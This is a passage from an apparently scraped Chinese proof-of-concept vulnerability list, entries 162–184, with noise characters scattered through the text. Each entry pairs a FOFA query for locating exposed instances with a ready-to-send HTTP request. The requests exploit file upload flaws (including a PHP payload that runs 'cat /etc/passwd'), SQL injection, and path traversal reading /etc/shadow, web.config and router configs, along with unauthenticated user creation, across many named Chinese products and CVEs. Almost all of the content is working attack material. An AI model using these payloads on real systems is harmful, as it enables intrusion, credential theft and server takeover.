! W9 ^( C7 |' Z L8 u) T8 U" }http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
& s& s7 u5 S$ G0 E, v6 j) r# Mxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"># @/ l& @3 t- y: L+ r8 ^
<soap:Body>
! B, t8 E3 K; T+ J<UploadResume xmlns="http://tempuri.org/">
$ Y C5 Y, N2 d3 a5 K<ip>1</ip>0 L) x8 \0 z* _( b, l
<fileName>../../../../dizxdell.aspx</fileName>
9 o2 x7 G+ T3 `/ b<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>3 c: A/ V) C5 a7 ?; S, g. {
<tag>3</tag>
O- }, ?' H0 R- x3 ~7 N</UploadResume>6 c2 n8 B) @( B* l- I4 H3 D
</soap:Body>+ a2 A5 ~& s; h/ v
</soap:Envelope>
- t7 P. y; S1 m& w% b) G% a; h" \! u
# {3 G/ M/ @6 ?/ B$ p
http://x.x.x.x/dizxdell.aspx
5 Y& V Z! h/ [7 }& ]& }
3 s) H. S5 `1 [$ \+ g162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传5 [5 L8 O+ A) v) s8 |) I; T* H
FOFA: app="和丰山海-数字标牌"! O9 X+ o+ l* n S9 g5 X
POST /QH.aspx HTTP/1.1 e$ y5 A: r& b
Host: x.x.x.x
& l' w, ?+ o9 K8 M6 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
# `; R `# }% B% ^, ?+ J* EConnection: close
2 L) |& b. @4 Y, \9 }Content-Length: 583' u% c4 N% C7 y2 e- ?3 z# w5 l$ l
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey3 j7 d# h! \! M3 Q
Accept-Encoding: gzip
: S# h7 R4 W' K" S# V: p
" U$ t6 z- A5 y4 g" M; f. P/ w------WebKitFormBoundaryeegvclmyurlotuey. [0 `, i8 W/ P. f4 n' ^ j
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"3 d% u& b" [4 P! }
Content-Type: application/octet-stream" a5 ~! x6 H' X4 a! O
1 i6 J6 b* j" f3 S* O9 X/ f
<% response.write("ujidwqfuuqjalgkvrpqy") %>
$ ]! Y# n& c1 @1 g* R4 }; p------WebKitFormBoundaryeegvclmyurlotuey
5 W( `* [# m$ b- fContent-Disposition: form-data; name="action"
: g! Q! W- s |, }5 Y7 b- j8 j0 l
upload
3 L2 Z& P/ A. ]6 j, E------WebKitFormBoundaryeegvclmyurlotuey( ~: E9 O. Y( W3 ^6 R' o5 [6 L
Content-Disposition: form-data; name="responderId" J- B9 G. w6 b: w1 w
5 Q9 ~$ j4 h2 G! e* H4 g7 FResourceNewResponder: W( i* w, |1 v* U! S; }: L
------WebKitFormBoundaryeegvclmyurlotuey
" ^4 r& k R0 T' h: Z2 BContent-Disposition: form-data; name="remotePath"
' ^+ `1 ~ r3 v* |. y- R9 b' O/ J2 j; Q; }9 a- b
/opt/resources$ |+ A0 U( K6 z( Z: x
------WebKitFormBoundaryeegvclmyurlotuey--6 d- _8 y" @6 G
0 @$ ?8 y) R# J7 \4 [ ]0 {
# O# y' Y/ b; B3 v2 ]- d* chttp://x.x.x.x/opt/resources/kjuhitjgk.aspx6 N' ?7 g; F! P: e
* K0 d( [- w ]& O* ~3 T
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
; I% U4 d$ h2 B% W9 ]( PFOFA: icon_hash="-795291075"2 o/ d7 H/ b3 Y, _7 K
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1' a" v* k6 k( J# U# s8 I/ b5 D+ V
Host: x.x.x.x( o9 Y. T+ s1 o8 U& K! m# v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36$ u& f$ F4 q: {1 j$ f
Connection: close
% O1 O7 F! v, `, \+ L6 ^& W4 aContent-Length: 293
, M" s' D/ D' A- }5 GAccept: */*( b) |3 ], G2 r
Accept-Encoding: gzip, deflate) ?2 A2 T! N* H" G
Accept-Language: zh-CN,zh;q=0.9
7 C& e) \) l9 k& X% ]9 T4 }! o0 O% ]Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
6 j# L0 b4 e* [/ `/ _
- Y2 p% y0 P; b) b% |+ q------iiqvnofupvhdyrcoqyuujyetjvqgocod6 [/ F6 e$ `! k4 q V5 g2 L
Content-Disposition: form-data; name="name"
: e! L5 {. g, w1 K; a' ^3 i0 D6 H/ m& b& ^
1.php
* M8 a! Q1 g" M3 [------iiqvnofupvhdyrcoqyuujyetjvqgocod
8 _ I7 A' {: j/ }! VContent-Disposition: form-data; name="upfile"; filename="1.php"
7 I* d# D' j# i5 Y9 tContent-Type: image/jpeg: Y) K. R- F- g
/ m# e. B9 d# d1 P4 h2 j$ v
rvjhvbhwwuooyiioxega* J$ o/ c; w( q, t5 H
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
$ P. q: ]& }' p- z: Y. t3 G& v( T! d1 J( {# W, \! X5 b
; ~/ c( [. \* }164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
, P$ y( c5 ]2 x' CFOFA: title="智慧综合管理平台登入" u2 S6 S( W" _1 Y% k
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
8 D1 \" K4 S* { L$ P% |( x, hHost: x.x.x.x
1 b( m% H/ ^5 ^0 ` \% Q- X, YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
. E/ N2 g9 i' m; l3 N8 f2 r* yContent-Length: 288
2 ?# v% H( y, @Accept: application/json, text/javascript, */*; q=0.01
! v& i T3 z: \6 MAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
! S s# Z% i$ ~/ ~4 JConnection: close2 X0 ]# \* J0 f& J, ]2 s |( x! H
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
$ V) }; B9 j% ^) F& n, h* cX-Requested-With: XMLHttpRequest6 Z) ^3 j" |2 J( s' P
Accept-Encoding: gzip
% M3 F" [; `* v/ Q# _, x P) K3 m4 T3 E. R, A9 m0 k! A
------dqdaieopnozbkapjacdbdthlvtlyl+ J4 S* G8 s0 z7 v3 W' Z+ l9 t7 D
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
h& @3 A f6 R3 V; q4 q1 Z2 [5 DContent-Type: image/jpeg) @5 S8 u; T$ Z
& N* B# E$ k ~' V- z
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>& l6 D2 d. V9 R# `7 M9 v
------dqdaieopnozbkapjacdbdthlvtlyl-- ?; y; N8 h3 q7 K: n+ V1 f
i; P" {0 e/ |
- y3 b7 Q' X4 V6 B$ }
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
8 c6 X! x8 K5 Y, b
- ?( T; q$ Q: _/ _165. OrangeHRM 3.3.3 SQL 注入5 T# S6 Y) c% c! K$ M5 c$ L1 a
CVE-2024-36428
: e9 ~% H1 k. P5 t& }) l) ^FOFA: app="OrangeHRM-产品") q6 Q% Z7 l8 |$ r5 O0 `: q. I6 k
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))' q3 {) j8 N8 x; S5 P/ w9 f6 o
Z% u* G% }4 m
/ O. ]0 ?! y3 l3 C7 Q3 r
166. 中成科信票务管理平台SeatMapHandler SQL注入
2 `3 N$ k2 ]. U) S0 pFOFA:body="技术支持:北京中成科信科技发展有限公司"
Y; Q+ j* d0 GPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.15 W9 x9 G. r7 b8 Z8 P: C
Host:
4 X0 ?: w0 J: hPragma: no-cache
. A' V4 N2 m6 yCache-Control: no-cache; g' n3 Z8 f+ [/ y0 [
Upgrade-Insecure-Requests: 1# S) |6 k+ S- i3 H$ c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
: V8 @- [' z+ O) s$ ]" xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* i5 {; q7 p9 l: e ~3 @
Accept-Encoding: gzip, deflate6 a% ?# W" T, |
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
& r4 U5 `# [" |; d$ ?4 ] H1 QCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE& |. C' A8 E1 _$ A9 s3 x0 g2 \1 e: A
Connection: close' p: d: H' y/ z- u. a
Content-Type: application/x-www-form-urlencoded
' @4 c+ m9 [1 h& ?1 @Content-Length: 89" x" p" Y/ T" B9 g4 h
$ B$ B3 S' r" S+ yMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
x! O8 t! P" Z6 @) O% B$ }+ _
! @$ W5 X+ d3 l7 m. z2 ~; n
' y1 a( \( z: c/ P; K' K167. 精益价值管理系统 DownLoad.aspx任意文件读取
( `5 p5 {8 h F& FFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
8 k! M2 K8 l2 W. G; zGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
8 _; N: ]5 r3 N3 A( vHost:' m% Q0 i, \" V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 f' Y7 r8 Q" j% l7 R& a3 X
Content-Type: application/x-www-form-urlencoded
- b: b3 X& `2 z8 o) _+ t' p$ l @Accept-Encoding: gzip, deflate
! e, J. w) [4 S) XAccept: */*4 x/ f' y- s' { M) s4 x% U/ v
Connection: keep-alive
0 ~7 Q0 _) d8 y. M: N& U' c& J, a! {4 v
5 f/ [: i6 O: O$ T+ g- X: R2 V% x168. 宏景EHR OutputCode 任意文件读取' `$ U( x% w3 x5 Q) K8 ~! }
FOFA:app="HJSOFT-HCM"
0 l1 N* k; r3 ` c) ]0 v! `+ u: fGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
- Y7 r5 l u7 C$ y. BHost: your-ip3 L$ }6 R+ T; \- u7 k9 R: G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
: L( |5 O% A ]( k9 C" NContent-Type: application/x-www-form-urlencoded
# `; _& J2 ~% L# m0 zConnection: close
+ ]( I7 N+ a" V7 W- i$ t$ w& l+ x4 `7 C; ^+ s3 g: u( J* t! _
9 U5 p' K l9 a5 |& @# G
0 [* H$ _( n+ h- {8 ?# T6 U169. 宏景EHR downlawbase SQL注入, Z& l6 u$ w( }' J( ~- t/ K
FOFA:app="HJSOFT-HCM"
2 M) u W/ v7 k5 lGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
7 F0 w- ^9 S$ @: R2 z0 x+ QHost: your-ip) ]: {# V# C8 R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! B1 H( k2 Z8 X4 Q+ J V3 b. w
Accept: */*
) H, K, ]4 G' o6 a$ Z9 SAccept-Encoding: gzip, deflate- F: ^; e* S2 }
Connection: close
F7 W, G; C6 u: ?( i$ M: X# Y& N) i3 h4 F
. j. H" Z& x3 r) L7 Y& M0 ^+ n* E6 V9 D
# ?3 f. k6 [+ N3 v) J2 ^
170. 宏景EHR DisplayExcelCustomReport 任意文件读取7 c& G) H/ S. h. x
FOFA:body="/general/sys/hjaxmanage.js"$ @6 G* y9 E" C* Z T2 s
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
) y9 ]! c; } m- L0 X$ `, p' hHost: balalanengliang
3 e( f" ?7 X7 Z. J& jUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 O3 s; S6 N/ x7 {5 XContent-Type: application/x-www-form-urlencoded
" e" P6 L; ~- ]9 K
* B3 ]! S& k1 C6 Y1 cfilename=../webapps/ROOT/WEB-INF/web.xml* T! J8 Q# u" x$ E7 j5 l
: Y1 K# A5 O9 D3 d Q$ C. q, j6 q; [: C* q# t+ N
171. 通天星CMSV6车载定位监控平台 SQL注入
, p! r) c& m9 T1 p, w. WFOFA:body="/808gps/"+ K- l6 q" S& e+ W6 O6 \- k ]
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1% N) ` c5 ?3 j- n9 t h
Host: your-ip4 c9 S5 h! j" `$ A. X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
/ g; n% }8 N# p1 h! N" gAccept: */*5 J( E; g9 d" n, ]# @( g
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 S, t0 S# E1 ~3 z) ]1 \' S9 z
Accept-Encoding: gzip, deflate O8 |' ^3 |* D6 t; u7 r
Connection: close
7 `1 G% p. M0 `8 B. l9 o) E: R! a3 q" B# l* |8 H- l
& {( ]' F; d W/ d6 j9 k% g c
/ E- e7 l/ I+ D( J172. DT-高清车牌识别摄像机任意文件读取3 p5 V: S; J2 C5 ^1 P: @8 y
FOFA:app="DT-高清车牌识别摄像机"( D' ^. ~0 H. E4 A. g
GET /../../../../etc/passwd HTTP/1.1
) X( V; W" _. pHost: your-ip
, N) I+ C% J2 v9 p% T0 z/ h% mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
' Y) |; X) ^1 Y: ^! MAccept-Encoding: gzip, deflate( ~5 O$ n$ Q& {/ G" v& g5 [7 Y
Accept: */*6 y7 N6 ]+ E5 [" i
Connection: keep-alive/ A: Z# J( ]( `0 T/ `
7 x# Q, y- b" y7 G
# E# J0 e8 a/ \2 B; ^0 @# _# v4 a( }2 F( Z7 o+ B( J1 e
173. Check Point 安全网关任意文件读取' y$ r7 |$ m- @- u
CVE-2024-24919
" r5 s0 g) q3 A/ I2 W/ T- `3 c- eFOFA:app="Check_Point-SSL-Network-Extender": Y* P% h2 u9 }9 ~4 L- q
POST /clients/MyCRL HTTP/1.14 d& ]1 A9 A" C9 D( w
Host: your-ip
1 Y0 o6 k! R( l% c. [) @Content-Type: application/x-www-form-urlencoded
j3 y' z, S4 N
* [* Z& _) q, i7 B0 C' R0 C" L. faCSHELL/../../../../../../../etc/shadow' Q5 ]6 m+ Q, r4 a9 H- S/ J
. t2 P/ U9 V! A$ o. T/ y- V: F) }! _% K }
# S; U0 ^6 f9 E. f1 h3 E: U0 d
174. 金和OA C6 FileDownLoad.aspx 任意文件读取& ^+ B" _! H% r! T$ P0 a) |
FOFA:app="金和网络-金和OA"
) U2 X) B: d( r2 g4 z/ WGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
% m& }2 |- @+ {6 W* AHost: your-ip
4 {% x% i( ?& `! N: M; ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
& p0 U6 X6 K" Y; S% HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ O4 h% t% }; F
Accept-Encoding: gzip, deflate, br
1 i! k7 z# J& ~9 R0 q0 PAccept-Language: zh-CN,zh;q=0.9
, S* T) ]& s7 P9 d% mConnection: close
z( [0 d; @7 B; p' F& a! K* ]" L7 |5 B, f* a5 s' H3 T
& D+ ]' B4 L+ s$ P0 b0 p7 j
9 E E# J% Z) J) P* e6 U1 K$ f175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
! h7 U+ R8 B% ? T, MFOFA:app="金和网络-金和OA"
4 f: ]) y5 v0 X( S8 Y! ~6 lGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
. @- r* \$ d9 O( a. EHost: {- s; t4 p( l9 D" j% e1 a" f
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
7 b7 {2 e! I7 m. sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# U$ t8 F4 P' z" aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 p x8 X% f' E' g+ z5 o
Accept-Encoding: gzip, deflate- ~1 ]& z$ K# ~
Connection: close y8 k$ W/ k5 C4 S: [
Upgrade-Insecure-Requests: 1
8 ^% f0 q$ Q) `' I3 W x4 q4 G+ P. L9 h1 W+ d: u& m/ B" K
9 ^6 o3 R6 _: Q$ o% O6 E2 U7 H
176. 电信网关配置管理系统 rewrite.php 文件上传( G1 n2 Z: m/ D9 S
FOFA:body="img/login_bg3.png" && body="系统登录"
# U: I; K. d" LPOST /manager/teletext/material/rewrite.php HTTP/1.1* _) r) D" s6 d. Z1 m
Host: your-ip/ V3 p! z* ]# y0 \' f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.08 U* y/ h; m5 D; q! l3 T
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT' T* y1 L! D0 [; f) c
Connection: close
% R' f, Y& I$ p$ n ~* @( m
% U5 J! {/ p' L7 Q* p% Z# j------WebKitFormBoundaryOKldnDPT6 y2 J* t+ I# b! ^- N
Content-Disposition: form-data; name="tmp_name"; filename="test.php"5 J# e9 j% g# k5 M7 L
Content-Type: image/png3 Z- J1 L+ T3 D2 S: ?$ d
! \$ Q. ]* U2 h) K, D( L
<?php system("cat /etc/passwd");unlink(__FILE__);?>
1 m( K* F- x; ~( j------WebKitFormBoundaryOKldnDPT% \; \; A* K3 Z. g& c2 A$ D
Content-Disposition: form-data; name="uploadtime"
1 d; {6 E% k# g* b' g. _
% f3 }/ p4 q2 y4 @, `& T; s
) l0 @ p7 C% G/ D6 Z. Y! N------WebKitFormBoundaryOKldnDPT--3 S$ X- d& E+ f' J, l8 z! j
' y8 ^% {: Y% s$ X3 h! F" _! }+ ?+ y8 _7 P/ R) |7 {
) P7 I. t( ]. u1 O177. H3C路由器敏感信息泄露. v6 ^+ J& `6 t- I
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
1 n4 h0 u' v% ^2 g5 [/userLogin.asp/../actionpolicy_status/../M60.cfg. K+ [% ^, p+ v$ K6 r0 x2 R. `. R B
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
( u) w) k! |8 [9 p: ]/userLogin.asp/../actionpolicy_status/../GR5200.cfg' v; E8 [- G; S E( d
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
$ o% X6 D' A! }3 F) I9 {' {/userLogin.asp/../actionpolicy_status/../GR2200.cfg3 C" f# r) e; D5 n% {
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg* H0 z; m: C: z
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg5 e1 G& J& h+ j8 ]3 E' _3 G
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg7 h- n/ U, w" o- `/ U
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg4 d" F; f$ y5 n8 w# r
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
) D5 _* g6 V# G2 w/userLogin.asp/../actionpolicy_status/../ER5100.cfg2 c' S$ D. l* a( H3 }: h
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg- t* ~% n5 w: g7 P) ^3 V0 s; N# f
/userLogin.asp/../actionpolicy_status/../ER3260.cfg7 W0 k4 |/ i& Y: V* [# d/ T. `
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg' {+ {4 s* P. O7 a) \+ M- T
/userLogin.asp/../actionpolicy_status/../ER3200.cfg& r( c7 l* g( e# h( z. V
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
+ n( Z! c4 K/ P3 O2 T/userLogin.asp/../actionpolicy_status/../ER3108G.cfg3 n. ^3 U' z* _7 i S
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
* J: b0 g l* S$ O" E9 L* |/userLogin.asp/../actionpolicy_status/../ER3100.cfg& T. p/ H* J$ y# B2 F: d
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
. c1 F* U$ m$ @, V6 Y
) O3 s1 W( @( m$ a& j) z" @% L: p) X6 X$ B- X* p: b5 \
178. H3C校园网自助服务系统-flexfileupload-任意文件上传, b1 O1 d6 K. k5 y4 h% C. S
FOFA:header="/selfservice"6 w& |# n2 X5 t( j3 P5 O6 u
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1/ I# B+ }; {3 m2 w1 k
Host:
. s* ~4 d% y% j3 u8 EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
! y0 S! ^ J+ Q& O" G- m4 OContent-Length: 2522 `6 G( E8 x9 ]8 F
Accept-Encoding: gzip, deflate
! v! o( m. K: x" g& N* ?9 x+ nConnection: close( D$ O! s! S2 [: @3 A6 S% |. _
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l# n4 m) J+ f0 [4 i: f; C
-----------------aqutkea7vvanpqy3rh2l$ x P7 X! A8 G0 N
Content-Disposition: form-data; name="12234.txt"; filename="12234"
- k+ L! e9 t0 ]6 h( f, ~4 X- dContent-Type: application/octet-stream
1 [& j9 O" l- u' H8 H. ^Content-Length: 2553 z& L* }4 f0 Y3 i" l2 w
( F6 c0 O, ]6 A( s- _
12234/ M. e' S, o5 k# d; i
-----------------aqutkea7vvanpqy3rh2l--5 g1 u4 M7 x! \) M" m% O
3 E7 W3 Q& F' R2 r4 U2 F8 v! E Z. x! E I6 [
GET /imc/primepush/%2e%2e/flex/12234.txt
4 l! `# e6 G3 V+ P& |4 [
+ u! [" k7 |' N9 w! V; t' y3 t8 X) W7 c; I e; X! D
179. 建文工程管理系统存在任意文件读取) k8 r. V" ]: \# ] @ t' e% _7 L
POST /Common/DownLoad2.aspx HTTP/1.1
; h6 ~2 } L$ J/ ]* [: EHost: {{Hostname}}
, v o; t: A6 U4 T+ e: eContent-Type: application/x-www-form-urlencoded
9 c$ Q( k% V# W. wUser-Agent: Mozilla/5.0
" c6 L# {; x" n* I; [
, Q e7 |/ T1 s% Qpath=../log4net.config&Name=
" O1 u2 i) _1 J! _! }# E( j# a/ E
; s2 E( l1 ~6 a0 C
! \! v8 C5 {, f" o- c4 G180. 帮管客 CRM jiliyu SQL注入) D4 } J0 b4 h$ @; {4 s
FOFA:app="帮管客-CRM". N& C" @) {6 ?+ C. Y
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
i; t ]3 b! ^4 d' tHost: your-ip
, p% M% @8 Y& [5 T: i0 [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.369 ~7 Z. Q. G$ p2 X _% X, C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" j" d1 a/ D- @, yAccept-Encoding: gzip, deflate
' t0 }: U1 I# ZAccept-Language: zh-CN,zh;q=0.9
2 U$ _, T! h; G1 k$ b0 [Connection: close
3 e" I" N* a' H9 z& J$ P$ b
9 i7 f+ E, H% B) }. k0 l% E8 k W) ]% Q6 d K5 a
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
5 Y1 s2 S o' p% u8 Y- HFOFA:"PDCA/js/_publicCom.js"
1 u5 E2 P- a: J. j" E! F) P) q! xPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
! Q7 B1 X. o, r# e0 FHost: your-ip$ z& |0 i$ x- n* p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36* T& G( K8 v5 b. [7 r4 W+ A8 j% `* g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ o, z- W& \' S! D0 b: h4 i8 EAccept-Encoding: gzip, deflate, br
; F) M! \/ [8 wAccept-Language: zh-CN,zh;q=0.96 j* W5 X; }9 S- n H
Connection: close
4 R! m- Z0 T1 K2 EContent-Type: application/x-www-form-urlencoded d3 T9 l( k B- u3 e* ], c; `
7 `8 M9 G, |; I; T9 F
* I; G8 K7 ~3 U0 A1 S6 [action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20$ L1 M: a% h3 ~9 P$ {4 M/ i1 g
. h& `* k( X3 `0 _& F. t* I( j" u8 o: G: a) ~0 w1 d$ w
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
H5 q; R( I, P1 |5 u3 q8 ~7 s9 KFOFA:"PDCA/js/_publicCom.js"
4 ]) R7 l/ N1 S( r; k) ]- ?) K+ G, YPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
) b5 i5 ]" v" Q& h1 |9 ?+ LHost: your-ip
6 k6 a- y' Y" U8 ~: }- L9 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.364 ]! ? o2 y( \3 d4 O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 h# ]9 e8 Y' [; P8 ~/ PAccept-Encoding: gzip, deflate, br
# q5 Q9 l7 p& q# u! KAccept-Language: zh-CN,zh;q=0.9" | P1 r$ ~" D+ J7 f& `. j
Connection: close
- E6 n& H9 x* v, d; V9 OContent-Type: application/x-www-form-urlencoded
/ j$ g; G5 S' W* }8 q2 r$ I
, S# \ n+ y9 a9 ?. O/ o0 \: m0 Y
" t8 u& p7 f2 E, yusername=test1234&pwd=test1234&savedays=1
2 T# {" w7 p! n8 U3 m/ H1 T, L5 S
z5 T1 S. T5 o. y' B+ G: ^# C5 A4 w
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
9 @4 j {9 ?9 F' r/ aFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"2 R! b; }! F6 B6 x: @
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.17 v! l/ i/ c/ I- P' [
Host: your-ip
3 ?* T/ f2 y5 d& @% b! @& @9 ^User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
5 s4 T4 h; R$ J/ s; m( m8 j* TAccept-Charset: utf-8
# L4 B3 P) p8 \' mAccept-Encoding: gzip, deflate& P" ~( x' k8 d( ]3 ?
Connection: close5 J9 S8 h( T$ y! G) K7 i3 `* ]
5 W& R K- g9 a, Q' [
7 c6 y6 x- L. v
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
4 C+ s5 p1 V5 i9 t6 c7 P GFOFA:server="SunFull-Webs"8 y7 k8 V6 O N3 O
POST /soap/AddUser HTTP/1.1
& L8 i7 D0 Q- z, c0 EHost: your-ip) M! K: q" o0 V' \3 @
Accept-Encoding: gzip, deflate- [% d+ E, b$ R# A! ~8 _- q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.00 q) ~0 ?" H4 H* y4 T2 D2 @
Accept: application/xml, text/xml, */*; q=0.018 e. T2 `% s. i& K6 U/ \; B
Content-Type: text/xml; charset=utf-8. F" \+ k) C- _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 D& R# c2 C: z9 w( P4 b+ O
X-Requested-With: XMLHttpRequest' t7 g8 e5 x6 V3 z
5 I- V5 v8 k0 Q, s3 s% ^
